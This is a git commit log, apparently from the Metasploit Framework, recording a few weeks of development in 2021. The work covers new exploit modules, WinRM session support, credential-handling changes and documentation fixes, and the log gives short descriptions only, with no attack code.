h00die 3c82f43644 only scan exploitable wordpress things 2021-09-06 11:56:32 -04:00
Ashley Donaldson a65bfc9b00 If we're told on the first request that our creds are wrong, don't try again 2021-09-07 00:10:39 +10:00
Ashley Donaldson 78d6c26ec0 Make winrm_cmd module work with the changes 2021-09-06 23:36:59 +10:00
Ashley Donaldson 00100f426c Handle the server ceasing to respond 2021-09-06 23:24:23 +10:00
adfoster-r7 883866d7a8 Fix markdown 2021-09-06 13:51:44 +01:00
Ashley Donaldson 170d911c71 Fixed edge case; scanner automagically changes the SSL value based on the port 2021-09-06 22:49:52 +10:00
Ashley Donaldson 0e103e8550 Enabled encryption for WinRM when using Negotiate auth 2021-09-06 22:25:34 +10:00
adfoster-r7 7cba3231c4 Use markdown link syntax 2021-09-06 12:32:32 +01:00
adfoster-r7 3762829f01 Fix dead links 2021-09-06 12:27:30 +01:00
adfoster-r7 6ce1402851 Fix dead links 2021-09-06 11:57:25 +01:00
adfoster-r7 020d3b05a1 Remove summary/detail wrappers 2021-09-06 11:57:25 +01:00
adfoster-r7 efafe49e74 Rename .Net Deserialization to Dot-Net-Deserialization 2021-09-06 11:57:25 +01:00
kensh1ro 1adde377ec Replace XOR with CHACHA and remove unnecassary code 2021-09-06 12:23:46 +03:00
adfoster-r7 28a71032a5 Updated API (markdown) 2021-09-06 01:45:38 +01:00
adfoster-r7 cb7a2e1526 Created API (markdown) 2021-09-06 01:42:42 +01:00
Ashley Donaldson eeef8a3085 Support domain login in WinRM module 2021-09-06 10:25:36 +10:00
Ashley Donaldson 7a75a91dc6 Request stdout on a separate thread, so we are alerted when the shell dies. 2021-09-06 09:33:44 +10:00
adfoster-r7 d8a224e41f Fix broken link 2021-09-05 16:51:22 +01:00
adfoster-r7 a69c90867c Fix invalid links 2021-09-05 15:47:15 +01:00
adfoster-r7 6ff3266e38 Update textile to markdown 2021-09-05 15:34:43 +01:00
adfoster-r7 4949c458a6 Update textile to markdown 2021-09-05 15:34:06 +01:00
adfoster-r7 6435efa580 Rename file extension for consistency 2021-09-05 15:30:43 +01:00
adfoster-r7 8a6c4d87ad Remove dead link 2021-09-04 23:20:18 +01:00
adfoster-r7 6e3a1ed14b Update link to be consistent 2021-09-04 23:18:53 +01:00
adfoster-r7 70343a57fc Fix broken link 2021-09-04 23:15:50 +01:00
Mike Brown 28e358066b Fixed typo
Extraneous `.`. Thanks, macOS!
2021-09-04 14:34:05 -07:00
Mike Brown 2bfc8d35d0 Defined capability flags in comment
Added descriptive comment for included capability flags.
2021-09-04 14:32:30 -07:00
h00die 65aae010ce more libs for moodle and teacher priv esc to rce module 2021-09-04 13:31:11 -04:00
space-r7 80dc8b9502 add elfinder module 2021-09-03 18:26:18 -05:00
bwatters a7d255bbe5 Land #15627, Update some post libs to use library methods defined in file.rb
Merge branch 'land-15627' into upstream-master
2021-09-03 16:43:11 -05:00
Jack Heysel 99352ad107 Move methods from lfs.rb, fix fail_with types 2021-09-03 16:17:35 -05:00
jheysel-r7 93aea73939 Update modules/exploits/windows/http/git_lfs_rce.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-09-03 16:17:35 -05:00
Jack Heysel 5294c714aa Fix spacing 2021-09-03 16:17:35 -05:00
Jack Heysel f9c4c35431 Update the target_suitable? method 2021-09-03 16:17:35 -05:00
Jack Heysel ba64dce5b7 Rubocop offenses 2021-09-03 16:17:30 -05:00
Jack Heysel 3c43bd409d Added docs an Git User-Agent FP 2021-09-03 16:15:39 -05:00
Jack Heysel 514a37ef2f Removed unecessary gem file + rubocop 2021-09-03 16:15:39 -05:00
Jack Heysel 21d99a74fb beta commit 2021-09-03 16:15:38 -05:00
adfoster-r7 89b442805f Land #15640, Add missing python3 shebang 2021-09-03 21:35:29 +01:00
adfoster-r7 c0e81acc92 Add missing python3 shebang 2021-09-03 19:58:46 +01:00
Your Name ad2cc6a1fe Fixed Module logic 2021-09-03 12:55:52 -05:00
Grant Willcox e94d3bf260 Fix minor documentation change 2021-09-03 12:55:51 -05:00
Grant Willcox e62f5e3011 Update documentation to reflect latest changes and update module to check files exist and bail if they don't, including when uploading a custom image 2021-09-03 12:55:45 -05:00
Grant Willcox 059198095a First round of edits to module from review process 2021-09-03 12:55:44 -05:00
Grant Willcox 3334fce5e8 Fix up initial documentation concerns 2021-09-03 12:55:44 -05:00
Your Name 817904a916 Add Geutebruck Post Exploitation Module 2021-09-03 12:55:39 -05:00
Spencer McIntyre 2c3f914d9c Land #15639, Fix rename_file for shell sessions 2021-09-03 13:46:27 -04:00
Metasploit e3adc1ded1 Bump version of framework to 6.1.5 2021-09-03 12:31:52 -05:00
Grant Willcox c4ab16aa75 Fix typo in lib/msf/core/post/file.rb that was preventing normal cmd shells from being able to rename files. 2021-09-03 11:15:10 -05:00
Jeffrey Martin 3d87d77b8a Land #15636, Fix regression issue with serializing reported events 2021-09-03 11:08:20 -05:00
dwelch-r7 b9e1214567 Land #15637, Remove explicit rhosts protocol validation 2021-09-03 16:44:20 +01:00
adfoster-r7 39950a8352 Remove explicit rhosts protocol validation 2021-09-03 15:30:57 +01:00
adfoster-r7 50330c1559 Land #15522, Add feature flagged support for fully interactive Meterpreter shells 2021-09-03 14:24:41 +01:00
adfoster-r7 4b818000fc Fix regression issue with serializing reported events 2021-09-03 13:09:14 +01:00
Ashley Donaldson 142526904a Moved command shell creation across to winrm_login, rather than winrm_cmd 2021-09-03 13:34:07 +10:00
Spencer McIntyre 0aea67b17d Updated Hashes and Password Cracking (markdown) 2021-09-02 15:26:17 -04:00
Metasploit 31e0e73e56 Bump version of framework to 6.1.4 2021-09-02 12:04:19 -05:00
Your Name 41690d6e1d Linting again 2021-09-02 17:33:57 +01:00
Your Name f336f7a4d6 Removed global vars & Fixed linting 2021-09-02 17:30:18 +01:00
Spencer McIntyre e2beff1467 Warn when a DB option is ignored 2021-09-02 11:57:38 -04:00
Spencer McIntyre 5138e1c7d3 Remove extra invocation of prepend_db_passwords 2021-09-02 11:57:38 -04:00
Spencer McIntyre 01882da5de Add documentation and #filtered? 2021-09-02 11:57:38 -04:00
Spencer McIntyre dd86907b17 Move the prepend_db calls into the mixin 2021-09-02 11:57:38 -04:00
Spencer McIntyre 2db16478b1 Switch to PrivateCredentialCollection
These module should be using the PrivateCredentialCollection.
2021-09-02 11:57:38 -04:00
Spencer McIntyre 5d443b9409 Update AuthBrute modules
This updates existing modules that use the AuthBrute mixin to use the
new build_credential_collection API to consistently handle the new
option.
2021-09-02 11:57:38 -04:00
Spencer McIntyre a76eb67d89 Add the DB_SKIP_EXISTING option 2021-09-02 11:57:36 -04:00
Spencer McIntyre 2981e23d0a Initial DB_SKIP_EXISTING option 2021-09-02 11:56:53 -04:00
Metasploit 0a6e662f62 automatic module_metadata_base.json update 2021-09-02 10:13:16 -05:00
adfoster-r7 588e91ae27 Land #15253, Add http/smb/mysql/postgres/ssh support in rhosts option 2021-09-02 16:05:11 +01:00
adfoster-r7 69725b95d1 Land #15633, Update workflow to Ubuntu 18.04 and use newer Ruby Setup 2021-09-02 15:47:20 +01:00
adfoster-r7 d6e5c75148 Land #15621, add automation cache creation tools 2021-09-02 15:42:56 +01:00
dwelch-r7 310f2fb86f Add warning for trying to use fully interactive shells without a pty 2021-09-02 15:22:35 +01:00
sjanusz d191042cbf Update workflow to Ubuntu 18.04 2021-09-02 14:06:55 +01:00
adfoster-r7 f3ad3e8292 Re-renamespace error handling, and validate rhost schemas 2021-09-02 13:00:05 +01:00
adfoster-r7 3b23951d62 Correctly handle inline payloads being set via datastore options, i.e. run payload=xyz 2021-09-02 13:00:05 +01:00
adfoster-r7 736457dbd4 Cleanup comments 2021-09-02 13:00:05 +01:00
adfoster-r7 30ba8f2f38 Add replicant functionality before running tests, to handle bug in self.replicant.datastore.option.values being nil 2021-09-02 13:00:04 +01:00
adfoster-r7 3cc56eb9bb Support setting PATH for http modules such as tomcat_mgr_deploy 2021-09-02 13:00:04 +01:00
adfoster-r7 327e2c1fe8 Handy truthy uri.path edgecase for smbshares 2021-09-02 13:00:04 +01:00
adfoster-r7 591574455d Validate cidr notation 2021-09-02 13:00:04 +01:00
adfoster-r7 15002c1a3c Track original unparsed rhosts value correctly 2021-09-02 13:00:04 +01:00
adfoster-r7 07ab195056 Preference module specified username/passwords over http basic auth 2021-09-02 13:00:03 +01:00
adfoster-r7 13a5d314de Add test for payload option validation 2021-09-02 13:00:03 +01:00
Alan Foster 15e8037344 Add mysql:// support 2021-09-02 13:00:03 +01:00
Alan Foster 7aeebbd93e Consolidate module usage logic 2021-09-02 13:00:03 +01:00
Alan Foster a11e303f85 Support spaces in rhost values 2021-09-02 13:00:03 +01:00
Alan Foster 4b12aaf49e Ensure there are no errors in rhosts_walker 2021-09-02 13:00:02 +01:00
Alan Foster 07af90c5a7 Fix replicant edgecase 2021-09-02 13:00:02 +01:00
Alan Foster 628002baa3 Placeholder test for commas in url 2021-09-02 13:00:02 +01:00
Alan Foster 20d6e28c49 Avoid recalculating the rhost walker count 2021-09-02 13:00:02 +01:00
Alan Foster 112f43f798 Consolidate module argument parsing for ensuring consistency 2021-09-02 13:00:02 +01:00
Alan Foster 134fef21c4 Improve validation rhosts validation 2021-09-02 13:00:01 +01:00
Alan Foster f96dc59cd4 Spike smb uri support 2021-09-02 13:00:01 +01:00
Alan Foster 4899884a33 Add http support in rhosts option 2021-09-02 12:59:50 +01:00
Ashley Donaldson b50a1aa988 Moved reusable functionality into separate file 2021-09-02 21:58:07 +10:00
dwelch-r7 ef0d68cb8e Land #15572, Correctly handle quoted console options and whitespace 2021-09-02 12:55:39 +01:00
Ashley Donaldson 41fb8dc885 Updated documentation for winrm_cmd 2021-09-02 20:52:20 +10:00
Ashley Donaldson a530336630 Fix segfault apparently caused by using the Rex HTTP client in a finalizer 2021-09-02 19:08:25 +10:00
Ashley Donaldson 1138a5bba7 Better messages in the session info table 2021-09-02 17:31:57 +10:00
Ashley Donaldson fdfac2212f Cleanup up old socket-based approach 2021-09-02 16:58:07 +10:00
Ashley Donaldson f16d91f8b4 Coerce failure immediately on bad password when setting up a session 2021-09-02 15:00:48 +10:00
Ashley Donaldson 6648a47ce7 Check stdin repeatedly 2021-09-02 13:23:26 +10:00
Grant Willcox 2f0ecc4c28 Land #15623, Creds command improvements 2021-09-01 17:06:57 -05:00
h00die 77dff0fc13 working admin shell 2021-09-01 17:49:17 -04:00
h00die 3580920dde moving more to libs 2021-09-01 17:36:38 -04:00
Spencer McIntyre ccccccde27 Add -r and rely on tbl being initialized 2021-09-01 17:01:57 -04:00
Mike Brown 5742e1c20e Add DFLAG_BIG_CREATION to capability flags
I have been having trouble with this module (and other projects) using the included set of capability flags (0x3499c) on a specific host. I took some time to analyze the problem and it appears to be with the included flag set. In my case (and I suspect others'), the target node was rejecting the client with "not_allowed". After testing I found that simply adding DFLAG_BIG_CREATION (0x40000) allowed this exploit to work, both on the host I was having trouble with, and an older one where this (unmodified) exploit was working. Breakdown of flags is below.

```
0x0007499c == 0b0000 0000 0111 0100 1001 1001 1100
                   |       |||  |   |  | |  | ||-- DFLAG_EXTENDED_REFERENCES
                   |       |||  |   |  | |  | |-- DFLAG_DIST_MONITOR
                   |       |||  |   |  | |  |-- DFLAG_FUN_TAGS
                   |       |||  |   |  | |-- DFLAG_NEW_FUN_TAGS 
                   |       |||  |   |  |-- DFLAG_EXTENDED_PIDS_PORTS 
                   |       |||  |   |-- DFLAG_NEW_FLOATS 
                   |       |||  |-- DFLAG_SMALL_ATOM_TAGS
                   |       |||-- DFLAG__UTF8_ATOMS
                   |       ||-- DFLAG_MAP_TAG 
                   |       |-- **DFLAG_BIG_CREATION**
                   |-- DFLAG_HANDSHAKE_23
```
2021-09-01 10:45:41 -07:00
Metasploit 5760146753 automatic module_metadata_base.json update 2021-09-01 11:09:21 -05:00
Grant Willcox 0e0e3bbcfb Land #15603, Add Geutebruck CVE_2021_335XX command injection module 2021-09-01 10:59:22 -05:00
Jeffrey Martin 4746684735 adjustment to rebuild module cache as a tool 2021-09-01 09:18:05 -05:00
Spencer McIntyre 10cabf336e Land #15628, Refresh session info
Fixes #15615
2021-09-01 10:01:15 -04:00
dwelch-r7 84003678af Adhere to SYS_PROCESS naming convention 2021-09-01 13:00:39 +01:00
dwelch-r7 a4d7035214 Adhere to SYS_PROCESS naming convention 2021-09-01 12:58:45 +01:00
adfoster-r7 f2fcea88a7 Land #15629, fix windows msfconsole crash - exclude full json rpc path from zeitwerk 2021-09-01 12:03:26 +01:00
Metasploit 049af48a2f automatic module_metadata_base.json update 2021-09-01 04:39:18 -05:00
adfoster-r7 ded8200396 Land #15537, Add support for ruby 3 2021-09-01 10:30:54 +01:00
Ashley Donaldson b78b7413ef Use stdin rather than separate commands 2021-09-01 17:05:42 +10:00
Metasploit 50ace3f7bc automatic module_metadata_base.json update 2021-08-31 18:56:20 -05:00
bwatters ff50a94348 Land #15567, Add in Exploit for CVE-2021-3490
Merge branch 'land-15567' into upstream-master
2021-08-31 18:46:25 -05:00
Grant Willcox d83ede6306 Fix up some check method issues and some XML data validation issues identified during review 2021-08-31 18:25:01 -05:00
Your Name 5599929b6a Fixed Randomization 2021-08-31 18:25:00 -05:00
Grant Willcox 0a57641aa4 Add in documentation and module code cleanness improvements and also make the output easier for readers to understand should something fail midway through. 2021-08-31 18:24:57 -05:00
Grant Willcox 30a7ee1bf2 Final very minor documentation fixes for better clarity 2021-08-31 18:24:56 -05:00
Your Name cd74e34e3c Fixed Authors 2021-08-31 18:24:51 -05:00
Your Name b5b0b3087a Fixed References and Description 2021-08-31 18:24:50 -05:00
Your Name 56cde3eaba Add Geutebruck CVE_2021_335XX command injections module 2021-08-31 18:24:14 -05:00
h00die 5e17074259 moodle_teacher_enrollement_priv_esc working but not full exploit chain 2021-08-31 16:52:08 -04:00
Grant Willcox 488f58a068 Attempt to fix RuboCop errors 2021-08-31 15:36:00 -05:00
Grant Willcox 3bca3b0bcb Update exploit code to use & after the command to execute as root so it executes in the background and doesn't hang Metasploit. Also update the logic of the code to check the response from executing the exploit and respond accordingly and update the documentation to match 2021-08-31 15:07:37 -05:00
Jeffrey Martin b4075dc288 exclude full json rpc path from zeitwerk
eventmachine fails to load on Windows, this is a temporary
workaround until a more complete solution can be identified.
2021-08-31 14:29:03 -05:00
dwelch-r7 3c5501ea14 Add TLVs for terminal rows/columns 2021-08-31 18:53:16 +01:00
Grant Willcox e824e54880 Land #15573 - Default simplify_module to not load saved config 2021-08-31 11:47:18 -05:00
Tim W a537791585 Fix #15615, refresh session info on manual load of stdapi 2021-08-31 15:46:30 +01:00
Gaurav Purswani a2219b9568 Merge branch 'master' into check_consistency_post_libs 2021-08-31 19:56:28 +05:30
pingport80 26d1a3d5e0 minor fixes 2021-08-31 19:46:38 +05:30
Tim W 68194cb8af Fix #15615, refresh session info after running meterpreter > sysinfo 2021-08-31 15:16:17 +01:00
pingport80 9a03462f02 update some post libs to use library methods defined in file.rb 2021-08-31 19:25:35 +05:30
Spencer McIntyre 33da289a9c Print stderr when it's not blank 2021-08-31 09:18:11 -04:00
Ashley Donaldson 3192f9b4f7 Neatness improvements 2021-08-31 22:30:31 +10:00
Ashley Donaldson 3839bc5dea Use rex sockets for WinRM transport 2021-08-31 21:36:25 +10:00
Ashley Donaldson 8d047dca59 Basic command shell operational. Does not yet utilise Rex sockets. 2021-08-31 15:34:04 +10:00
Ashley Donaldson 3dc1b22cdc Created WinRM command shell type 2021-08-31 11:00:53 +10:00
Spencer McIntyre e779d1286f Update the spec for a bad -t option 2021-08-30 16:11:01 -04:00
Spencer McIntyre 3c9c057fc3 Add Net-NTLM hashcat formatter support 2021-08-30 15:23:35 -04:00
Spencer McIntyre 111d092c11 Refactor creds command for consistent filtering
This refactors the core creds command so that the filtering of processed
objects is consistently applied whether the results are printed or
written to a file.
2021-08-30 15:23:31 -04:00
Brendan 6d3032afce Update for automated rubocopping 2021-08-30 13:34:53 -05:00
Jeffrey Martin 97b03a81c9 add automation cache creation
When new modules are committed, automation needs to rebuild the cache.

The scripts provided here will utilize the public docker container to
rebuild the cache json file. One drawback to this approach is that if
new dependencies for external modules are added the container must be
up to date in dockerhub before the rebuild occurs.

Ideas on a better way to do this without needing to build the docker
container in each automation run would be appreciated.
2021-08-30 12:21:06 -05:00
Metasploit 21fa8a8904 automatic module_metadata_base.json update 2021-08-30 12:04:50 -05:00
Grant Willcox 337e80b244 Land #15375, Fix LDAP hashdump crash on null char 2021-08-30 11:55:46 -05:00
Spencer McIntyre 877ea86aaf Support filtering creds by realm 2021-08-30 11:13:12 -04:00
Spencer McIntyre 0e4374245e Properly format Net-NTLMv1 and Net-NTLMv2 hashes 2021-08-30 10:30:47 -04:00
Spencer McIntyre 3fd6035835 Honor the filtering options when exporting 2021-08-30 10:30:47 -04:00
Spencer McIntyre f1395e40f1 Allow querying creds based on the JtR type 2021-08-30 10:30:47 -04:00
Metasploit 61e2baa49d automatic module_metadata_base.json update 2021-08-30 09:10:37 -05:00
Spencer McIntyre 8317a484a3 Land #15548, Overhaul SMB auth capture server 2021-08-30 10:01:55 -04:00
Your Name 690af9f956 Fixed CVE Number 2021-08-30 08:18:19 +01:00
h00die e3115ba9e9 rubocop this thing 2021-08-29 17:18:06 -04:00
h00die 5ea2cf9e5a moodle_admin_shell_upload working and minor other fixes 2021-08-29 16:59:44 -04:00
h00die b969d57f22 admin shell upload initial commit 2021-08-29 10:51:58 -04:00
h00die 176c1f0751 moodle lib and module 2021-08-29 10:50:25 -04:00
h00die d3b00aa10a Merge branch 'cleanup_moodle' into moodle_310_rce 2021-08-29 07:15:01 -04:00
Metasploit a1eef6a2c1 automatic module_metadata_base.json update 2021-08-28 10:07:52 -05:00
adfoster-r7 e485339baf Land #15614, remove duplicate autocheck 2021-08-28 15:59:39 +01:00
h00die a35be13958 moodle 3.8.0 tested 2021-08-28 08:10:28 -04:00
Your Name 70f3f9d731 Fixed CVE Number 2021-08-28 11:33:42 +01:00
h00die a5674683f0 remove duplicate autocheck 2021-08-27 20:08:58 -04:00
h00die 3801c525c3 cleanup moodle_cmd_exec 2021-08-27 20:03:27 -04:00
h00die cd24ad1bdf lint 2021-08-27 19:53:45 -04:00
h00die b9c9ed243a lint 2021-08-27 19:51:52 -04:00
h00die c0a8535764 moodle spellcheck rce 2021-08-27 19:51:52 -04:00
Spencer McIntyre 95015f0c2b Update the ProxyShell module docs 2021-08-27 17:50:28 -04:00
h00die 7883d99e95 Updated How to Send an HTTP Request Using HttpClient (markdown) 2021-08-27 17:36:11 -04:00
Spencer McIntyre 425dcf1f81 Cleanup and refactor the exploit logic 2021-08-27 17:26:40 -04:00
Spencer McIntyre 965dec43ae Delete the draft email 2021-08-27 16:59:17 -04:00
Spencer McIntyre 0b3b0aab7d Fix the UNC path conversion regex 2021-08-27 15:56:58 -04:00
Spencer McIntyre 5e32ca9f56 Improve error checks and dont use whoami 2021-08-27 15:52:34 -04:00
Spencer McIntyre c4cf99795e Remove the requirement on knowing an email address 2021-08-27 15:34:51 -04:00
Spencer McIntyre 845c01f27f Store the enumerated mailbox email addresses 2021-08-27 15:07:13 -04:00
Spencer McIntyre 6c01a0dbea Work off of the system mailbox 2021-08-27 14:32:26 -04:00
Metasploit ec98bd8043 automatic module_metadata_base.json update 2021-08-27 13:18:57 -05:00
Spencer McIntyre 3ff76fa137 Land #15608, Use Rubocop for proper alignment 2021-08-27 14:00:31 -04:00
sjanusz ab596dc13d Adds realm, host and service for core credentials 2021-08-27 17:33:17 +01:00
adfoster-r7 4a9a15e638 Run Rubocop layout rules on modules 2021-08-27 17:19:43 +01:00
Grant Willcox ce86eb2db6 Land #15590, Fix external module encoding 2021-08-27 11:10:45 -05:00
Spencer McIntyre d5fdcb8fcb Add the plumbing to enumerate email addresses 2021-08-27 11:44:27 -04:00
Your Name 8d28dece69 Added Notes 2021-08-27 16:42:54 +01:00
adfoster-r7 4fb341f86e Autofix module info hash values on the same line 2021-08-27 16:39:49 +01:00
Metasploit 6ca7e00b63 automatic module_metadata_base.json update 2021-08-27 09:12:55 -05:00
adfoster-r7 c042e310a3 Land #15606, Update metasploit payloads version 2021-08-27 15:04:42 +01:00
adfoster-r7 7daec4ab39 Update metasploit payloads version 2021-08-27 12:55:19 +01:00
Your Name 6a501a37ff Add CVE-2021-33549 exploit for Geutebruck G-CAM 2021-08-27 01:28:26 +01:00
Metasploit 34d7f5b9a7 automatic module_metadata_base.json update 2021-08-26 18:10:50 -05:00
Grant Willcox c04d1224c0 Land #15596 - fix version check for docker_credential_wincred 2021-08-26 18:00:55 -05:00
Grant Willcox 7cf2e66085 Fix up regex to properly match results and not include the 'version' part of the string, which was causing Rex::Version to return incorrect results and therefore make the 'check' method fail 2021-08-26 17:41:41 -05:00
Grant Willcox 415b46d9a7 Fix Rubocop errors 2021-08-26 16:52:58 -05:00
Dimitrie-Toma Furdui 63aaa8f438 fixed version check for docker_credential_wincred 2021-08-26 16:33:45 -05:00
Grant Willcox 697b748f07 Land #15582, Msf::Post::Linux::Kernel: Check kernel.unprivileged_bpf_disabled for values 1 or 2 2021-08-26 14:37:26 -05:00
Grant Willcox 93ad6e4c93 Change unprivileged_bpf_disabled? to use read_file so it will also check if the file exists or not 2021-08-26 14:24:04 -05:00
Metasploit ed92857612 automatic module_metadata_base.json update 2021-08-26 12:36:06 -05:00
Tim W 6c0b90eabb Land #15532, add module for CVE-2021-21300 and git mixins 2021-08-26 18:26:04 +01:00
Metasploit 9b6cdf04f7 Bump version of framework to 6.1.3 2021-08-26 12:05:12 -05:00
Metasploit 08ec56e31f automatic module_metadata_base.json update 2021-08-26 11:21:14 -05:00
Spencer McIntyre 674628e600 Land #15384, Improve Windows RDLL injection 2021-08-26 12:11:44 -04:00
space-r7 8b8d138812 Land #15496, specify SSLVersion for servers 2021-08-26 10:57:11 -05:00
Grant Willcox be9a7bc9b9 Fix up error in alpc_taskscheduler.rb where it expected a DLL but we passed it shellcode instead 2021-08-26 09:27:21 -05:00
adfoster-r7 db8bc751a2 Add note on existing rhosts functionality 2021-08-26 14:12:01 +01:00
Gaurav Purswani 28c41f5ec9 Merge branch 'master' into bin_pwsh_write_file 2021-08-26 07:27:07 +05:30
Grant Willcox 7652a2240e Add in missing import for modules/exploits/windows/local/ntapphelpcachecontrol.rb to prevent crashes due to execute_dll not being defined 2021-08-25 18:19:58 -05:00
Grant Willcox 6f9b06fb4b Add in Manfred Paul's original blog post and chompie1337's original PoC to the list of links. Also add in a relatively detailed description of how to add in new targets to this exploit to the documentation in case that helps anyone down the line 2021-08-25 18:09:07 -05:00
Metasploit ff9a5f1758 automatic module_metadata_base.json update 2021-08-25 14:28:25 -05:00
space-r7 ab622405de Land #15593, add WP Learnpress SQLi module 2021-08-25 14:18:51 -05:00
space-r7 17da80163c fix typo, set COUNT default to 3 as noted in docs 2021-08-25 14:17:47 -05:00
adfoster-r7 89ab189a87 Add quick fix for alias tab completion; Aliases most likely needs to be implemented differently 2021-08-25 19:58:54 +01:00
sjanusz 83c27b2509 Fix external module encoding 2021-08-25 17:44:45 +01:00
A Galway 857e54815f update ruby_smb version 2021-08-25 17:40:18 +01:00
agalway-r7 4bcfe81ddb replace magic value with constant
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2021-08-25 14:35:16 +01:00
Grant Willcox 29a230ec72 Improve error handling for module 2021-08-24 17:36:37 -05:00
Grant Willcox 5a80e9678c Address Spencer's comments and remove changes that don't directly use the DLL injection library API change 2021-08-24 16:34:01 -05:00
A Galway 8f77c6ff8a adds JTR NTLM constant & improves module options 2021-08-24 12:18:27 +01:00
dwelch-r7 1d26885b34 Fix typo 2021-08-24 11:46:31 +01:00
h00die b9db47f873 wp_learnpress sqli 2021-08-23 19:45:45 -04:00
Spencer McIntyre d90c0293ec Land #15477, Add read_file and readable? for psh 2021-08-23 17:49:44 -04:00
Grant Willcox bd490d35ed Add support for Linux 5.11.x on Fedora 2021-08-23 15:09:10 -05:00
Grant Willcox db5ac81ecf Fix up mistakes bcoles pointed out and also add in a check to ensure we are only targetting x64 systems 2021-08-23 13:23:40 -05:00
dwelch-r7 d3c14d3cd6 Address review comments 2021-08-23 16:25:59 +01:00
Metasploit a28c134403 automatic module_metadata_base.json update 2021-08-23 06:24:23 -05:00
adfoster-r7 5837ceb03d Escape paths and perform consistent autocompletion of quoted strings 2021-08-23 12:07:45 +01:00
adfoster-r7 ef6c743452 Correctly handle quoted console options and whitespace 2021-08-23 12:07:40 +01:00
adfoster-r7 441acaeac8 Land #15580, Add default payload option to targets 2021-08-23 12:05:09 +01:00
adfoster-r7 f355fc6b3f Add examples of uri support 2021-08-23 11:57:58 +01:00
h00die 816126e226 update postgres and fix link to framework 2021-08-22 11:52:08 -04:00
adfoster-r7 be76a0fefa Land #15584, update wordpress themes and plugins list
update wordpress themes and plugins list
2021-08-22 15:24:44 +01:00
h00die b8d3fda3a6 update wordpress themes and plugins list 2021-08-22 09:07:18 -04:00
Brendan Coles 3f5693bdb7 Msf::Post::Linux::Kernel: Check kernel.unprivileged_bpf_disabled for values 1 or 2 2021-08-21 09:29:48 +00:00
kensh1ro 3bf8a5c1ba Change Alloction from RWX to RW 2021-08-21 11:10:07 +03:00
Grant Willcox e46611cffb Add in support for exploiting Fedora 32 with Linux kernel 5.10.12 2021-08-20 18:04:59 -05:00
Grant Willcox 75ae2b76f5 Add support for Fedora 32 Linux Kernel 5.9.8-100 and also fix an error where the wrong file was being used for Fedora 32 Linux Kernel 5.8.8. 2021-08-20 16:50:20 -05:00
Grant Willcox 5abf407228 Add support for Fedora 32 with Linux Kernel 5.8.8-200 2021-08-20 15:42:34 -05:00
Grant Willcox dd806a9d61 Add in support for Fedora 32 running kernel 5.7.11-200 2021-08-20 13:37:52 -05:00
sjanusz 8e00c5a188 Add default payload option to targets 2021-08-20 16:38:22 +01:00
Metasploit 5f6112766a Bump version of framework to 6.1.2 2021-08-20 08:04:11 -05:00
William Vu 5bb423e99e Land #15578, cisco_rv130_rmi_rce dead docs fix 2021-08-20 05:13:43 -05:00
William Vu e480e868b9 Remove dead cisco_rv130_rmi_rce documentation
It is now cve_2019_1663_cisco_rmi_rce.
2021-08-20 05:06:00 -05:00
William Vu ae3e3e1b37 Land #15575, Gemfile.lock update 2021-08-19 21:03:08 -05:00
William Vu d9d3d1f841 Update Gemfile.lock 2021-08-19 20:59:43 -05:00
Metasploit da04459459 automatic module_metadata_base.json update 2021-08-19 16:49:52 -05:00
Spencer McIntyre c47efcabfc Land #15556, Add shell support to enum_unattended 2021-08-19 17:40:51 -04:00
Grant Willcox b479cb61a4 Add in scenario for Ubuntu 20.04.02 LTS and show that its still working as expected 2021-08-19 15:05:03 -05:00
Grant Willcox 945004ed97 Fix up typo that was breaking the code and also fix RuboCop errors 2021-08-19 14:12:03 -05:00
Grant Willcox b60ad3ee26 Fix up mistakes I noticed whilst doing edits on the code as well as some mistakes identified during peer review 2021-08-19 13:55:54 -05:00
Spencer McIntyre 274917ae82 Land #15564, Update post_common mixin methods 2021-08-19 14:31:37 -04:00
Spencer McIntyre db8a55436f Update the docs for command_exists? 2021-08-19 14:31:23 -04:00
pingport80 406b152752 add shell support to enum_unattend module
update registry operations

guard against nil when the unattendfile registry key is not present
2021-08-19 23:39:18 +05:30
Spencer McIntyre 5d33303263 Land #15332, rename_file function improvements 2021-08-19 12:08:12 -04:00
Spencer McIntyre bb82b41184 Update the rename_file docs 2021-08-19 12:08:03 -04:00
Metasploit c9a5a0aaf1 automatic module_metadata_base.json update 2021-08-19 10:41:58 -05:00
William Vu 31796c6236 Land #15561, ProxyShell exploit 2021-08-19 10:31:02 -05:00
William Vu 0a06730802 Update contributors 2021-08-19 10:30:21 -05:00
pingport80 10224a9c8c update regex to string in session type checks 2021-08-19 20:13:27 +05:30
Metasploit 45845af3f8 automatic module_metadata_base.json update 2021-08-19 08:29:47 -05:00
Spencer McIntyre 1519aef539 Land #15570, Fix smb enum gpp module 2021-08-19 09:20:38 -04:00
Jeffrey Martin 34aae6dc10 Updated Downloads by Version for 4.20.0 (textile) 2021-08-19 08:01:55 -05:00
dwelch-r7 8f51663545 Default simplify_module to not load_saved_config and update all references 2021-08-19 13:04:26 +01:00
Metasploit d53cc717ba automatic module_metadata_base.json update 2021-08-18 17:24:58 -05:00
space-r7 a75b649cf3 Land #15546, properly store UUID URLs 2021-08-18 17:15:14 -05:00
wvu bcf00a0d3a Update exchange_proxyshell_rce.md 2021-08-18 14:38:56 -05:00
Spencer McIntyre 84f8c44e69 Write to the targeted backend server 2021-08-18 12:34:40 -04:00
Spencer McIntyre 81163ec117 Revert changes to Gemfile.lock 2021-08-18 10:50:41 -04:00
Spencer McIntyre 75e63992d6 Write an exploit for ProxyShell 2021-08-18 10:50:34 -04:00
dwelch-r7 d98896564d limit raw mode to pty shells only 2021-08-18 15:08:00 +01:00
dwelch-r7 dd43265776 Change set_term_size to be a stdapi command 2021-08-18 15:08:00 +01:00
dwelch-r7 669caaf7a6 Rework interactive meterpreter shells feature flag 2021-08-18 15:07:59 +01:00
dwelch-r7 62d6fd7745 lock fully interactive shell behind feature flag 2021-08-18 15:07:59 +01:00
dwelch-r7 ae90c86333 Meterpreter interactive shell 2021-08-18 15:07:59 +01:00
adfoster-r7 d9baaed0ba Fix smb enum gpp module 2021-08-18 11:44:03 +01:00
Grant Willcox d5df47692c Add in first copy of the exploit along with the supporting source code and binaries. Documentation to come 2021-08-17 18:01:14 -05:00
pingport80 40f4fff278 update condition 2021-08-17 20:14:00 +05:30
pingport80 077ea6dc79 update common.rb to support powershell session type 2021-08-17 19:45:08 +05:30
pingport80 a7bed49e8a update readable? for directories 2021-08-17 16:39:23 +05:30
